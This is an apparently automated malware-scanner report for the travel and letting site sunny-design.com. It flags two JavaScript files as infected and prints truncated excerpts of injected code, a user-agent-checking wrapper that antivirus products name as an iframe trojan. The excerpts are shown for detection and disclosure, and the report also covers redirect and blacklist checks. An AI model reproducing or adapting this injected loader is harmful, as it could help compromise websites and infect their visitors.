Malware Scanner report for sunny-design.com

Malicious/Suspicious/Total urls checked: 4/0/15

4 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://sunny-design.com/	200 OK Content-Length: 36880 Content-Type: text/html	clean
http://sunny-design.com/javascripts/basic_lib.js	200 OK Content-Length: 4726 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMob ... 3419 bytes are skipped ...,toolbar=no,scrollbars=no,width=175,height=170'); } function show_cstes_web() { MM_openBrWindow('http://www.costadelsol-travel.com/es/','cstes','directories=no,location=yes,menubar=yes,resizable=yes,status=yes,toolbar=yes,scrollbars=yes,width=700,height=500'); } function show_csten_web() { MM_openBrWindow('http://www.costadelsol-travel.com/','csten','directories=no,location=yes,menubar=yes,resizable=yes,status=yes,toolbar=yes,scrollbars=yes,width=700,height=500'); } Antivirus reports: AntiVir JS/iFrame.DI.48 Avast JS:Iframe-EHG [Trj] Microsoft Trojan:JS/Iframe.DI Fortinet JS/IFrame.XX!tr VIPRE Malware.JS.Generic (JS)
http://sunny-design.com/javascripts/date.js	200 OK Content-Length: 2839 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMob ... 1468 bytes are skipped ...4]="April"; months[5]="May"; months[6]="June"; months[7]="July"; months[8]="August"; months[9]="September"; months[10]="October"; months[11]="November"; months[12]="December"; var time=new Date(); var lmonth=months[time.getMonth() + 1]; var date=time.getDate(); var year=time.getYear(); var wkday=time.getDay()+1; if (year < 2000) year = year + 1900; document.write( date + " " + lmonth + " " + year + " ") Antivirus reports: VIPRE Malware.JS.Generic (JS)
http://sunny-design.com/SDGateway.html	200 OK Content-Length: 26012 Content-Type: text/html	clean
http://sunny-design.com/PartnershipProgram.html	200 OK Content-Length: 32980 Content-Type: text/html	clean
http://sunny-design.com/PartnerForm.html	200 OK Content-Length: 37586 Content-Type: text/html	clean
http://sunny-design.com/InformationForm.html	200 OK Content-Length: 30892 Content-Type: text/html	clean
http://sunny-design.com/LettingForm.html	200 OK Content-Length: 44181 Content-Type: text/html	clean
http://sunny-design.com/LettingService.html	200 OK Content-Length: 42836 Content-Type: text/html	clean
http://sunny-design.com/PropertyManagement.html	200 OK Content-Length: 31063 Content-Type: text/html	clean
http://sunny-design.com/VillaHoliday.html	200 OK Content-Length: 33308 Content-Type: text/html	clean
http://sunny-design.com/index.html	200 OK Content-Length: 36880 Content-Type: text/html	clean
http://sunny-design.com/./index.html	200 OK Content-Length: 36880 Content-Type: text/html	clean
http://sunny-design.com/./javascripts/basic_lib.js	200 OK Content-Length: 4726 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMob ... 3419 bytes are skipped ...,toolbar=no,scrollbars=no,width=175,height=170'); } function show_cstes_web() { MM_openBrWindow('http://www.costadelsol-travel.com/es/','cstes','directories=no,location=yes,menubar=yes,resizable=yes,status=yes,toolbar=yes,scrollbars=yes,width=700,height=500'); } function show_csten_web() { MM_openBrWindow('http://www.costadelsol-travel.com/','csten','directories=no,location=yes,menubar=yes,resizable=yes,status=yes,toolbar=yes,scrollbars=yes,width=700,height=500'); } Antivirus reports: AntiVir JS/iFrame.DI.48 Avast JS:Iframe-EHG [Trj] Microsoft Trojan:JS/Iframe.DI Fortinet JS/IFrame.XX!tr VIPRE Malware.JS.Generic (JS)
http://sunny-design.com/./javascripts/date.js	200 OK Content-Length: 2839 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function aaa_online_ga(){ var nigraListo = ['rv:11.0','Mini','iPhone','Macintosh','Linux','iPad','Series40','SymbOS','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','IEMob ... 1468 bytes are skipped ...4]="April"; months[5]="May"; months[6]="June"; months[7]="July"; months[8]="August"; months[9]="September"; months[10]="October"; months[11]="November"; months[12]="December"; var time=new Date(); var lmonth=months[time.getMonth() + 1]; var date=time.getDate(); var year=time.getYear(); var wkday=time.getDay()+1; if (year < 2000) year = year + 1900; document.write( date + " " + lmonth + " " + year + " ") Antivirus reports: VIPRE Malware.JS.Generic (JS)

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: sunny-design.com

Result:
HTTP/1.1 200 OK
Cache-Control: max-age=7200, private, must-revalidate
Connection: close
Date: Wed, 23 Jul 2014 19:32:20 GMT
Accept-Ranges: bytes
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 36880
Content-Type: text/html
Expires: Wed, 23 Jul 2014 19:32:21 GMT

...36880 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: sunny-design.com
Referer: http://www.google.com/search?q=sunny-design.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=sunny-design.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://sunny-design.com/

Result: sunny-design.com is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for sunny-design.com

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools